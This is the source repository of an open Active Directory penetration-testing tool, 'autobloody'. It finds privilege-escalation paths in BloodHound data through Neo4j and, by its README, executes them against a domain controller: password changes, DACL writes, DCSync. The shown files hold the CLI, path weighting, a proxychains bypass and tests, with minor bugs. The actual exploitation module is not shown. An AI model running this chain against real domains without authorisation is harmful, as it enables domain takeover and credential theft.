├── requirements.txt ├── tests ├── __init__.py ├── test_timeout.py ├── test_automation_changes.py └── test_functional.py ├── autobloody ├── __init__.py ├── proxy_bypass.py ├── main.py ├── database.py └── automation.py ├── .gitignore ├── autobloody.py ├── .github └── FUNDING.yml ├── pyproject.toml ├── LICENSE └── README.md /requirements.txt: -------------------------------------------------------------------------------- 1 | . -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /autobloody/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.json 3 | venv/ 4 | *.egg-info/ 5 | dist/ 6 | build/ -------------------------------------------------------------------------------- /autobloody.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from autobloody import main 3 | 4 | 5 | if __name__ == "__main__": 6 | main.main() 7 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: CravateRouge 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # 
Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 13 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 14 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = ["hatchling"] 3 | build-backend = "hatchling.build" 4 | 5 | [project] 6 | name = "autobloody" 7 | authors = [ 8 | { name="CravateRouge", email="baptiste.crepin@ntymail.com" }, 9 | ] 10 | version = "1.1.0" 11 | description = "AD Privesc Automation" 12 | readme = "README.md" 13 | requires-python = ">=3.8" 14 | classifiers = [ 15 | "Programming Language :: Python :: 3", 16 | "License :: OSI Approved :: MIT License", 17 | "Operating System :: OS Independent", 18 | ] 19 | dependencies = [ 20 | "bloodyAD>=2.3.1", 21 | "neo4j>=5.0.0", 22 | ] 23 | 24 | [project.urls] 25 | "Homepage" = "https://github.com/CravateRouge/autobloody" 26 | "Bug Tracker" = "https://github.com/CravateRouge/autobloody/issues" 27 | 28 | [project.scripts] 29 | autobloody = "autobloody.main:main" -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 CravateRouge 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the 
following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /tests/test_timeout.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | import sys 3 | import argparse 4 | from unittest.mock import patch 5 | from autobloody import main 6 | 7 | 8 | class TestTimeoutArgument(unittest.TestCase): 9 | """Test that timeout argument is properly parsed and has correct default""" 10 | 11 | def test_timeout_default_value(self): 12 | """Test that timeout has default value of 60""" 13 | # Mock sys.argv to provide required arguments 14 | test_args = [ 15 | 'autobloody', 16 | '-dp', 'test_password', 17 | '-ds', 'TEST.SOURCE@DOMAIN.LOCAL', 18 | '-dt', 'TEST.TARGET@DOMAIN.LOCAL', 19 | '--host', '192.168.1.1' 20 | ] 21 | 22 | with patch.object(sys, 'argv', test_args): 23 | parser = argparse.ArgumentParser() 24 | # Recreate the parser setup from main.py 25 | parser.add_argument("-dp", "--dbpassword", required=True) 26 | parser.add_argument("-ds", "--dbsource", required=True) 27 | parser.add_argument("-dt", "--dbtarget", required=True) 28 | parser.add_argument("--host", required=True) 29 | parser.add_argument("--timeout", type=int, default=60) 30 | 31 | args = parser.parse_args(test_args[1:]) 32 | 33 | # Verify default timeout is 60 34 | 
self.assertEqual(args.timeout, 60) 35 | 36 | def test_timeout_custom_value(self): 37 | """Test that custom timeout value is properly set""" 38 | test_args = [ 39 | 'autobloody', 40 | '-dp', 'test_password', 41 | '-ds', 'TEST.SOURCE@DOMAIN.LOCAL', 42 | '-dt', 'TEST.TARGET@DOMAIN.LOCAL', 43 | '--host', '192.168.1.1', 44 | '--timeout', '120' 45 | ] 46 | 47 | with patch.object(sys, 'argv', test_args): 48 | parser = argparse.ArgumentParser() 49 | parser.add_argument("-dp", "--dbpassword", required=True) 50 | parser.add_argument("-ds", "--dbsource", required=True) 51 | parser.add_argument("-dt", "--dbtarget", required=True) 52 | parser.add_argument("--host", required=True) 53 | parser.add_argument("--timeout", type=int, default=60) 54 | 55 | args = parser.parse_args(test_args[1:]) 56 | 57 | # Verify custom timeout is properly set 58 | self.assertEqual(args.timeout, 120) 59 | 60 | 61 | if __name__ == "__main__": 62 | unittest.main() 63 | -------------------------------------------------------------------------------- /autobloody/proxy_bypass.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | import os 3 | import socket 4 | import platform 5 | from bloodyAD import utils 6 | 7 | LOG = utils.LOG 8 | 9 | 10 | class ProxyBypass: 11 | proxy_connect = None 12 | 13 | def __init__(self): 14 | proxy_detected = ( 15 | "LD_PRELOAD" in os.environ and "proxychains" in os.environ["LD_PRELOAD"] 16 | ) 17 | LOG.info("[*] Connection to Neo4j") 18 | if not proxy_detected: 19 | LOG.info("[*] No proxy detected") 20 | return 21 | supported_platform = platform.system() in ["Darwin", "Linux"] 22 | if not supported_platform: 23 | LOG.warning( 24 | f"[-] Proxy detected but {plateform.system()} is not currently" 25 | " supported. 
Please raise an issue on the Github repo" 26 | ) 27 | return 28 | 29 | self.proxy_connect = socket.socket.connect 30 | 31 | socket.socket.connect = real_connect 32 | LOG.info("[+] Proxy bypass enabled for Neo4j connection") 33 | 34 | def disable(self): 35 | if self.proxy_connect: 36 | socket.socket.connect = self.proxy_connect 37 | LOG.info("[+] Proxy bypass disabled") 38 | 39 | 40 | class c_addrinfo(Structure): 41 | pass 42 | 43 | 44 | c_addrinfo._fields_ = ( 45 | [ 46 | ("ai_flags", c_int), 47 | ("ai_family", c_int), 48 | ("ai_socktype", c_int), 49 | ("ai_protocol", c_int), 50 | ("ai_addrlen", c_size_t), 51 | ] 52 | + ( 53 | [ 54 | ("ai_canonname", c_char_p), 55 | ("ai_addr", POINTER(c_sockaddr_in)), 56 | ] 57 | if platform.system() == "Darwin" 58 | else [ 59 | ("ai_addr", c_void_p), 60 | ("ai_canonname", c_char_p), 61 | ] 62 | ) 63 | + [ 64 | ("ai_next", POINTER(c_addrinfo)), 65 | ] 66 | ) 67 | 68 | 69 | def real_connect(sock_obj, addro): 70 | libc = CDLL("libc.so.6") 71 | get_errno_loc = libc.__errno_location 72 | get_errno_loc.restype = POINTER(c_int) 73 | 74 | def errcheck(ret, func, args): 75 | if ret == -1: 76 | e = get_errno_loc()[0] 77 | raise OSError(e) 78 | return ret 79 | 80 | # addr = c_sockaddr_in(sock_obj.family, c_ushort(socket.htons(addro[1])), (c_byte *4)(*[int(i) for i in addro[0].split('.')])) 81 | # size_addr = sizeof(addr) 82 | c_getaddrinfo = libc.getaddrinfo 83 | c_getaddrinfo.errcheck = errcheck 84 | presult = POINTER(c_addrinfo)() 85 | hints = c_addrinfo() 86 | hints.ai_family = sock_obj.family 87 | hints.ai_socktype = sock_obj.type 88 | hints.ai_flags = 0 89 | hints.ai_protocol = sock_obj.proto 90 | c_getaddrinfo( 91 | addro[0].encode("utf-8"), 92 | str(addro[1]).encode("utf-8"), 93 | byref(hints), 94 | byref(presult), 95 | ) 96 | 97 | # Wait until DB response 98 | blocking = sock_obj.getblocking() 99 | sock_obj.setblocking(True) 100 | 101 | c_connect = libc.connect 102 | c_connect.errcheck = errcheck 103 | c_connect( 104 | 
sock_obj.fileno(), 105 | c_void_p(presult.contents.ai_addr), 106 | presult.contents.ai_addrlen, 107 | ) 108 | 109 | libc.freeaddrinfo(presult) 110 | 111 | sock_obj.setblocking(blocking) 112 | 113 | 114 | # class c_sockaddr_in(Structure): 115 | # _fields_ = [ 116 | # ('sa_family', c_ushort), 117 | # ('sin_port', c_ushort), 118 | # ("sin_addr", c_byte * 4), 119 | # ("__pad", c_byte * 8) 120 | # ] 121 | -------------------------------------------------------------------------------- /tests/test_automation_changes.py: -------------------------------------------------------------------------------- 1 | """ 2 | Unit tests for automation.py changes 3 | Tests the new functions for shadowCredentials and ACL inheritance checks 4 | """ 5 | import unittest 6 | from unittest.mock import Mock, AsyncMock, patch, MagicMock 7 | import sys 8 | import os 9 | 10 | # Add parent directory to path 11 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..')) 12 | 13 | from autobloody.automation import Automation 14 | 15 | 16 | class TestAutomationChanges(unittest.IsolatedAsyncioTestCase): 17 | """Test cases for the new automation functions""" 18 | 19 | def setUp(self): 20 | """Set up test fixtures""" 21 | self.mock_args = Mock() 22 | self.mock_args.username = "test_user" 23 | self.mock_args.password = "test_pass" 24 | self.mock_args.domain = "test.local" 25 | self.mock_args.host = "dc.test.local" 26 | 27 | # Create a simple path 28 | self.path = [] 29 | 30 | # Initialize Automation object 31 | self.automation = Automation(self.mock_args, self.path) 32 | 33 | def test_rel_types_mapping(self): 34 | """Test that rel_types mapping has been updated correctly""" 35 | # Check that edge type 100000 is mapped to _shadowCredentialsOrForceChange 36 | self.assertEqual( 37 | self.automation.rel_types[100000].__name__, 38 | '_shadowCredentialsOrForceChange' 39 | ) 40 | 41 | # Check that edge type 200 is mapped to _aclOuGpo 42 | self.assertEqual( 43 | self.automation.rel_types[200].__name__, 
44 | '_aclOuGpo' 45 | ) 46 | 47 | # Check that edge type 110000 still points to _forceChangePassword 48 | self.assertEqual( 49 | self.automation.rel_types[110000].__name__, 50 | '_forceChangePassword' 51 | ) 52 | 53 | def test_shadowCredentialsOrForceChange_exists(self): 54 | """Test that _shadowCredentialsOrForceChange method exists""" 55 | self.assertTrue(hasattr(self.automation, '_shadowCredentialsOrForceChange')) 56 | self.assertTrue(callable(getattr(self.automation, '_shadowCredentialsOrForceChange'))) 57 | 58 | def test_aclOuGpo_exists(self): 59 | """Test that _aclOuGpo method exists""" 60 | self.assertTrue(hasattr(self.automation, '_aclOuGpo')) 61 | self.assertTrue(callable(getattr(self.automation, '_aclOuGpo'))) 62 | 63 | async def test_shadowCredentialsOrForceChange_simulation(self): 64 | """Test _shadowCredentialsOrForceChange in simulation mode""" 65 | # Set up simulation mode 66 | self.automation.simulation = True 67 | self.automation.rel_str = { 68 | "password": "[Change password] of {} to {}" 69 | } 70 | 71 | # Create mock relationship 72 | rel = { 73 | "end_node": { 74 | "name": "target_user" 75 | } 76 | } 77 | 78 | # Mock _printOperation 79 | self.automation._printOperation = Mock() 80 | 81 | # Call the function 82 | await self.automation._shadowCredentialsOrForceChange(rel) 83 | 84 | # Verify _printOperation was called 85 | self.automation._printOperation.assert_called_once() 86 | 87 | async def test_aclOuGpo_simulation(self): 88 | """Test _aclOuGpo in simulation mode""" 89 | # Set up simulation mode 90 | self.automation.simulation = True 91 | self.automation.rel_str = { 92 | "genericAll": "[GenericAll given] on {} to {}" 93 | } 94 | 95 | # Create mock relationship 96 | rel = { 97 | "start_node": { 98 | "name": "source_user" 99 | }, 100 | "end_node": { 101 | "name": "target_ou" 102 | } 103 | } 104 | 105 | # Mock _genericAll 106 | self.automation._genericAll = AsyncMock() 107 | 108 | # Call the function 109 | await self.automation._aclOuGpo(rel) 110 
| 111 | # Verify _genericAll was called 112 | self.automation._genericAll.assert_called_once_with(rel) 113 | 114 | 115 | if __name__ == '__main__': 116 | unittest.main() 117 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ![bloodyAD logo](https://repository-images.githubusercontent.com/415977068/9b2fed72-35fb-4faa-a8d3-b120cd3c396f) autobloody 2 | `autobloody` is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound. 3 | 4 | ## Description 5 | This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. 6 | The automation is composed of two steps: 7 | - Finding the optimal path for privesc using bloodhound data and neo4j queries. 8 | - Execute the path found using `bloodyAD` package 9 | 10 | Because autobloody relies on [bloodyAD](https://github.com/CravateRouge/bloodyAD), it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc. 11 | 12 | ## Installation 13 | A python package is available: 14 | ```ps1 15 | pip install autobloody 16 | ``` 17 | 18 | Or you can clone the repo: 19 | ```ps1 20 | git clone --depth 1 https://github.com/CravateRouge/autobloody 21 | pip install . 22 | ``` 23 | ### Dependencies 24 | - [bloodyAD](https://github.com/CravateRouge/bloodyAD) 25 | - Neo4j python driver 26 | - Neo4j with BloodHound 27 | - Python 3 28 | 29 | For better performance, it's recommended to have the [GDS library](https://neo4j.com/docs/graph-data-science/current/installation/) installed in Neo4j. Without it, autobloody will use native CYPHER queries which are slower but still functional. 
30 | 31 | A light bloodhound environment with GDS plugin can be installed by launching `./bloodhound-ce` from [https://github.com/CravateRouge/Single-User-BloodHound](https://github.com/CravateRouge/Single-User-BloodHound). 32 | 33 | ## How to use it 34 | First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running. 35 | 36 | > :warning: **-ds and -dt values are case sensitive** 37 | 38 | Simple usage: 39 | ```ps1 40 | autobloody -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL' 41 | ``` 42 | 43 | Full help: 44 | ```ps1 45 | [bloodyAD]$ ./autobloody.py -h 46 | usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST [-y] [-v] [--timeout TIMEOUT] 47 | 48 | AD Privesc Automation 49 | 50 | options: 51 | -h, --help show this help message and exit 52 | --dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687") 53 | -du DBUSER, --dbuser DBUSER 54 | Neo4j username to use (default is "neo4j") 55 | -dp DBPASSWORD, --dbpassword DBPASSWORD 56 | Neo4j password to use 57 | -ds DBSOURCE, --dbsource DBSOURCE 58 | Case sensitive label of the source node (name property in bloodhound) 59 | -dt DBTARGET, --dbtarget DBTARGET 60 | Case sensitive label of the target node (name property in bloodhound) 61 | -d DOMAIN, --domain DOMAIN 62 | Domain used for NTLM authentication (optional, default is dbsource domain) 63 | -u USERNAME, --username USERNAME 64 | Username used for NTLM authentication (optional, default is dbsource sAMAccountName) 65 | -p PASSWORD, --password PASSWORD 66 | Cleartext password or LMHASH:NTHASH for NTLM authentication 67 | -k, --kerberos 68 | -c CERTIFICATE, --certificate CERTIFICATE 69 | Certificate authentication, e.g: "path/to/key:path/to/cert" 70 | -s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP) 71 | --host HOST 
Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3) 72 | -y, --yes Assume yes to apply the generated privesc 73 | -v, --verbose Enable verbose output (-v for INFO, -vv for DEBUG) 74 | --timeout TIMEOUT Connection timeout in seconds (default is 60) 75 | ``` 76 | 77 | ## How it works 78 | First a privesc path is found using the Dijkstra's algorithm implemented into the Neo4j's GDS library. 79 | The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by BloodHound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of edge and the type of node reached (e.g user,group,domain). 80 | 81 | Once a path is generated, `autobloody` will connect to the DC and execute the path and clean what is reversible (everything except `ForcePasswordChange` and `setOwner`). 82 | 83 | ## Limitations 84 | For now, only the following BloodHound edges are currently supported for automatic exploitation: 85 | - MemberOf 86 | - ForceChangePassword 87 | - AddMembers 88 | - AddSelf 89 | - DCSync 90 | - GetChanges/GetChangesAll 91 | - GenericAll 92 | - WriteDacl 93 | - GenericWrite 94 | - WriteOwner 95 | - Owns 96 | - Contains 97 | - AllExtendedRights 98 | - ReadGMSAPassword 99 | 100 | ## Support 101 | Like this project? Donations are welcome [![](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&color=%23fe8e86)](https://github.com/sponsors/CravateRouge) 102 | 103 | Need personalized support? send me an [email](mailto:baptiste.crepin@ntymail.com) for trainings or custom features. 
104 | -------------------------------------------------------------------------------- /tests/test_functional.py: -------------------------------------------------------------------------------- 1 | import unittest, subprocess, pathlib, json, os 2 | 3 | 4 | class TestModules(unittest.TestCase): 5 | @classmethod 6 | def setUpClass(cls): 7 | conf = json.loads((pathlib.Path(__file__).parent / "secrets.json").read_text()) 8 | cls.domain = conf["domain"] 9 | cls.rootDomainNamingContext = ",".join([ 10 | "DC=" + subdomain for subdomain in cls.domain.split(".") 11 | ]) 12 | cls.host = conf["pdc"]["ip"] 13 | cls.admin = { 14 | "username": conf["admin_user"]["username"], 15 | "password": conf["admin_user"]["password"], 16 | } 17 | cls.pkinit_path = conf["pkinit_path"] 18 | cls.toTear = [] 19 | cls.env = os.environ.copy() 20 | cls.autobloody_prefix = [ 21 | "python3", 22 | "autobloody.py", 23 | "--host", 24 | cls.host, 25 | "-d", 26 | cls.domain, 27 | ] 28 | cls.neo4j = { 29 | "username": conf["neo4j"]["username"], 30 | "password": conf["neo4j"]["password"], 31 | "uri": conf["neo4j"]["uri"], 32 | } 33 | # db = Database(cls.neo4j) 34 | # graph = populateAD() 35 | # db.createGraph(graph) 36 | # db.close() 37 | 38 | def test_SimpleRun(self): 39 | # TODO Add edges/nodes to neo4j database and delete them at the end of the run 40 | # TODO Add objects to AD and delete them at the end of the run 41 | # TODO check error if path doesn't exist in DB 42 | self.launchProcess( 43 | self.autobloody_prefix 44 | + [ 45 | "-y", 46 | "-u", 47 | "auto.john", 48 | "-p", 49 | "Password123!", 50 | "-dp", 51 | "Password123!", 52 | "-ds", 53 | "AUTO.JOHN@BLOODY.LOCAL", 54 | "-dt", 55 | "BLOODY.LOCAL", 56 | ] 57 | ) 58 | 59 | def populateAD(): 60 | graph = [ 61 | { 62 | "name": "AddSelf", 63 | "snode": { 64 | "label": "User", 65 | "prop": { 66 | "name": "auto.selfuser", 67 | "distinguishedname": "", 68 | "objectId": "", 69 | }, 70 | }, 71 | "enode": { 72 | "label": "Group", 73 | "prop": { 74 | 
"name": "auto.selfgroup", 75 | "distinguishedname": "", 76 | "objectId": "", 77 | }, 78 | }, 79 | } 80 | ] 81 | 82 | return graph 83 | 84 | def pkinit(self, username, outfile): 85 | self.assertRegex( 86 | self.launchProcess( 87 | [ 88 | "python3", 89 | f"{self.pkinit_path}/gettgtpkinit.py", 90 | "-dc-ip", 91 | self.host, 92 | "-cert-pem", 93 | f"{outfile}_cert.pem", 94 | "-key-pem", 95 | f"{outfile}_priv.pem", 96 | f"{self.domain}/{username}", 97 | f"{outfile}.ccache", 98 | ], 99 | False, 100 | ), 101 | "Saved TGT to file", 102 | ) 103 | for name in [f"{outfile}_cert.pem", f"{outfile}_priv.pem", f"{outfile}.ccache"]: 104 | self.toTear.append([(pathlib.Path() / name).unlink]) 105 | 106 | @classmethod 107 | def tearDownClass(cls): 108 | while len(cls.toTear): 109 | func = cls.toTear.pop() 110 | if len(func) > 1: 111 | func[0](*func[1:]) 112 | else: 113 | func[0]() 114 | 115 | def launchProcess(self, cmd, isErr=True, doPrint=True): 116 | out, err = subprocess.Popen( 117 | cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=self.env 118 | ).communicate() 119 | out = out.decode() 120 | if isErr: 121 | self.assertTrue(out, self.printErr(err.decode(), cmd)) 122 | else: 123 | out += "\n" + err.decode() 124 | if doPrint: 125 | print(out) 126 | return out 127 | 128 | def printErr(self, err, cmd): 129 | err = err.replace("\n", "\n ") 130 | self.err = f"here is the error output ->\n\n {cmd}\n{err}" 131 | return self.err 132 | 133 | 134 | from neo4j import GraphDatabase 135 | 136 | 137 | class Database: 138 | def __init__(self, neo4j_creds): 139 | self.driver = GraphDatabase.driver( 140 | neo4j_creds["uri"], auth=(neo4j_creds["user"], neo4j_creds["password"]) 141 | ) 142 | self._prepareDb() 143 | 144 | def close(self): 145 | self.driver.close() 146 | 147 | def createGraph(self, graph): 148 | with self.driver.session() as session: 149 | session.write_transaction(self._createGraph, graph) 150 | 151 | def destroyGraph(self, graph): 152 | with self.driver.session() as session: 
153 | session.write_transaction(self._destroyGraph, graph) 154 | 155 | @staticmethod 156 | def _createGraph(tx, graph): 157 | for rel in graph: 158 | tx.run( 159 | "CREATE (n:$slabel $sprop)", 160 | slabel=rel["snode"]["label"], 161 | elabel=rel["enode"]["label"], 162 | ) 163 | 164 | @staticmethod 165 | def _destroyGraph(tx, graph): 166 | pass 167 | 168 | 169 | if __name__ == "__main__": 170 | unittest.main(failfast=True) 171 | -------------------------------------------------------------------------------- /autobloody/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import argparse, sys, asyncio, logging 3 | from autobloody import automation, database, proxy_bypass 4 | 5 | LOG = logging.getLogger('autobloody') 6 | 7 | class PrefixedFormatter(logging.Formatter): 8 | """Custom formatter that adds prefixes based on log level""" 9 | 10 | PREFIXES = { 11 | logging.DEBUG: '[*]', 12 | logging.INFO: '[+]', 13 | logging.WARNING: '[!]', 14 | logging.ERROR: '[-]', 15 | logging.CRITICAL: '[-]', 16 | } 17 | 18 | def format(self, record): 19 | prefix = self.PREFIXES.get(record.levelno, '') 20 | if prefix: 21 | record.msg = f"{prefix} {record.msg}" 22 | return super().format(record) 23 | 24 | 25 | def setup_logging(verbosity): 26 | """Configure logging based on verbosity level""" 27 | # Remove existing handlers 28 | LOG.handlers.clear() 29 | 30 | # Set level based on verbosity 31 | if verbosity >= 2: 32 | level = logging.DEBUG 33 | elif verbosity == 1: 34 | level = logging.INFO 35 | else: 36 | level = logging.WARNING 37 | 38 | LOG.setLevel(level) 39 | LOG.propagate = False 40 | # Create console handler with custom formatter 41 | handler = logging.StreamHandler() 42 | handler.setLevel(level) 43 | formatter = PrefixedFormatter('%(message)s') 44 | handler.setFormatter(formatter) 45 | LOG.addHandler(handler) 46 | 47 | 48 | def main(): 49 | parser = argparse.ArgumentParser( 50 | description="AD Privesc 
Automation", 51 | formatter_class=argparse.RawTextHelpFormatter, 52 | ) 53 | 54 | # DB parameters 55 | parser.add_argument( 56 | "--dburi", 57 | default="bolt://localhost:7687", 58 | help='The host neo4j is running on (default is "bolt://localhost:7687")', 59 | ) 60 | parser.add_argument( 61 | "-du", 62 | "--dbuser", 63 | default="neo4j", 64 | help='Neo4j username to use (default is "neo4j")', 65 | ) 66 | parser.add_argument( 67 | "-dp", "--dbpassword", help="Neo4j password to use", required=True 68 | ) 69 | parser.add_argument( 70 | "-ds", 71 | "--dbsource", 72 | help="Case sensitive label of the source node (name property in bloodhound)", 73 | required=True, 74 | ) 75 | parser.add_argument( 76 | "-dt", 77 | "--dbtarget", 78 | help="Case sensitive label of the target node (name property in bloodhound)", 79 | required=True, 80 | ) 81 | 82 | # Exploitation parameters 83 | parser.add_argument("-d", "--domain", help="Domain used for NTLM authentication (Default is dbsource domain)") 84 | parser.add_argument( 85 | "-u", "--username", help="Username used for NTLM authentication (Default is dbsource sAMAccountName)" 86 | ) 87 | parser.add_argument( 88 | "-p", 89 | "--password", 90 | help="Cleartext password or LMHASH:NTHASH for NTLM authentication", 91 | ) 92 | parser.add_argument("-k", "--kerberos", action="store_true", default=False) 93 | parser.add_argument( 94 | "-c", 95 | "--certificate", 96 | help='Certificate authentication, e.g: "path/to/key:path/to/cert"', 97 | ) 98 | parser.add_argument( 99 | "-s", 100 | "--secure", 101 | help="Try to use LDAP over TLS aka LDAPS (default is LDAP)", 102 | action="store_true", 103 | default=False, 104 | ) 105 | parser.add_argument( 106 | "--host", 107 | help="Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)", 108 | required=True, 109 | ) 110 | parser.add_argument( 111 | "-y", 112 | "--yes", 113 | help="Assume yes to apply the generated privesc", 114 | action="store_true", 115 | default=False, 116 | ) 117 | 
parser.add_argument( 118 | "-v", 119 | "--verbose", 120 | help="Enable verbose output (-v for INFO, -vv for DEBUG)", 121 | action="count", 122 | default=0, 123 | ) 124 | parser.add_argument( 125 | "--timeout", 126 | help="Connection timeout in seconds (default is 60)", 127 | type=int, 128 | default=60, 129 | ) 130 | 131 | if len(sys.argv) == 1: 132 | parser.print_help(sys.stderr) 133 | sys.exit(1) 134 | 135 | args = parser.parse_args() 136 | 137 | # Setup logging based on verbosity 138 | setup_logging(args.verbose) 139 | asyncio.run(run_autobloody(args)) 140 | 141 | 142 | async def run_autobloody(args): 143 | path_dict = await pathgen(args) 144 | 145 | if not args.domain: 146 | args.domain = path_dict[0]["start_node"]["domain"] 147 | if not args.username: 148 | args.username = path_dict[0]["start_node"]["samaccountname"] 149 | 150 | automate = automation.Automation(args, path_dict) 151 | 152 | if args.yes: 153 | execute_path = "y" 154 | else: 155 | await automate.simulate() 156 | execute_path = input("\n\nApply this privesc?(y/n)") 157 | 158 | if execute_path == "y": 159 | await automate.exploit() 160 | print("\n[+] Done, attack path executed") 161 | else: 162 | print("\n[-] Attack path not executed") 163 | 164 | 165 | async def pathgen(args): 166 | bypass = proxy_bypass.ProxyBypass() 167 | db = database.Database(args.dburi, args.dbuser, args.dbpassword) 168 | 169 | path = db.getPrivescPath(args.dbsource, args.dbtarget) 170 | path_dict = [] 171 | for rel in path: 172 | start_node = { 173 | "name": rel.start_node["name"], 174 | "distinguishedname": rel.start_node["distinguishedname"], 175 | "objectid": rel.start_node["objectid"], 176 | "samaccountname": rel.start_node.get("samaccountname"), 177 | "domain": rel.start_node.get("domain"), 178 | } 179 | end_node = { 180 | "name": rel.end_node["name"], 181 | "distinguishedname": rel.end_node["distinguishedname"], 182 | "objectid": rel.end_node["objectid"], 183 | "samaccountname": rel.end_node.get("samaccountname"), 184 | 
"domain": rel.end_node.get("domain"), 185 | } 186 | path_dict.append({ 187 | "start_node": start_node, "end_node": end_node, "cost": rel.get("cost", rel.get("bloodycost")) 188 | }) 189 | 190 | db.close() 191 | bypass.disable() 192 | 193 | print( 194 | f"[+] Done, {len(path_dict)} edges have been found between {args.dbsource} and" 195 | f" {args.dbtarget}" 196 | ) 197 | return path_dict 198 | 199 | 200 | if __name__ == "__main__": 201 | main() 202 | -------------------------------------------------------------------------------- /autobloody/database.py: -------------------------------------------------------------------------------- 1 | from neo4j import GraphDatabase 2 | import logging 3 | 4 | LOG = logging.getLogger('autobloody') 5 | 6 | class Database: 7 | def __init__(self, uri, user, password): 8 | logging.getLogger("neo4j").setLevel(logging.WARNING) 9 | self.driver = GraphDatabase.driver(uri, auth=(user, password)) 10 | self._checkGDS() 11 | self._prepareDb() 12 | 13 | def getPrivescPath(self, source, target): 14 | with self.driver.session() as session: 15 | relationships = session.execute_read( 16 | self._findShortestPath, source, target 17 | ) 18 | return relationships 19 | 20 | def close(self): 21 | self.driver.close() 22 | 23 | def _checkGDS(self): 24 | """Check if GDS plugin is installed""" 25 | with self.driver.session() as session: 26 | try: 27 | # Try to call a GDS function 28 | result = session.run("RETURN gds.version()").single() 29 | self.gds_available = True 30 | LOG.info(f"GDS plugin detected (version {result[0]})") 31 | except Exception: 32 | self.gds_available = False 33 | LOG.warning("GDS plugin not detected, will use native CYPHER queries (slower)") 34 | 35 | def _prepareDb(self): 36 | with self.driver.session() as session: 37 | session.execute_write(self._setWeight) 38 | if self.gds_available: 39 | session.execute_write(self._createGraph) 40 | 41 | # Cost is based on edge exploitation difficulty and impact 42 | # If ldap doesn't need to be 
    # queried like with MemberOf, it has no cost
    # If edge gives Domain Admin rights, it has the lowest cost
    # If edge only requires reading ldap like ReadGMSAPassword, it has a low cost
    # If edge requires writing ldap, the cost will be higher and depend of how much writing is needed (e.g.WriteOwner requires 3 writing)
    # If edges requires manual steps after like GPO edges, cost is higher
    # If edges requires potentially changing passwords, cost is higher because it can disrupt services
    @staticmethod
    def _setWeight(tx):
        """Tag every exploitable BloodHound edge with a 'bloodycost' property.

        Runs one Cypher UPDATE per (edge-type set, end-node label) pair; the
        cost values encode the exploitation-effort ordering described in the
        comment block above, and they double as dispatch keys on the
        automation side (each cost maps to one exploitation handler).

        :param tx: neo4j transaction object used to run the queries
        """
        # Existing edges on https://github.com/BloodHoundAD/BloodHound/blob/master/docs/data-analysis/edges.rst
        bloodycosts = [
            {"cost": 0, "edges": "MemberOf", "endnode": "Group"},
            {
                "cost": 1,
                "edges": "DCSync|GenericAll|GetChangesAll|AllExtendedRights",
                "endnode": "Domain",
            },
            {"cost": 2, "edges": "WriteDacl|Owns", "endnode": "Domain"},
